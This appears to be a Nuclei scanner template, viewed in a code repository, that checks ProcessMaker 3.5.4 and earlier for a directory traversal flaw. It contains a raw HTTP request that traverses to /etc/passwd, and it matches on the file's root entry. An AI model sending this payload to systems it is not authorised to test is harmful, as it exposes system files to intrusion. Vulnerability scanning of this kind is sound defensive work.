nuclei-templates/vulnerabilities/other/processmaker-lfi.yaml

28 lines
495 B
YAML
Raw Normal View History

2021-08-31 08:33:47 +00:00
id: processmaker-lfi
info:
name: ProcessMaker <= 3.5.4 Directory Traversal
author: KrE80r
severity: high
reference:
- https://www.exploit-db.com/exploits/50229
2021-08-31 08:38:11 +00:00
- https://www.processmaker.com
2021-08-31 08:33:47 +00:00
tags: processmaker,lfi
requests:
- raw:
- |
GET /../../../..//etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200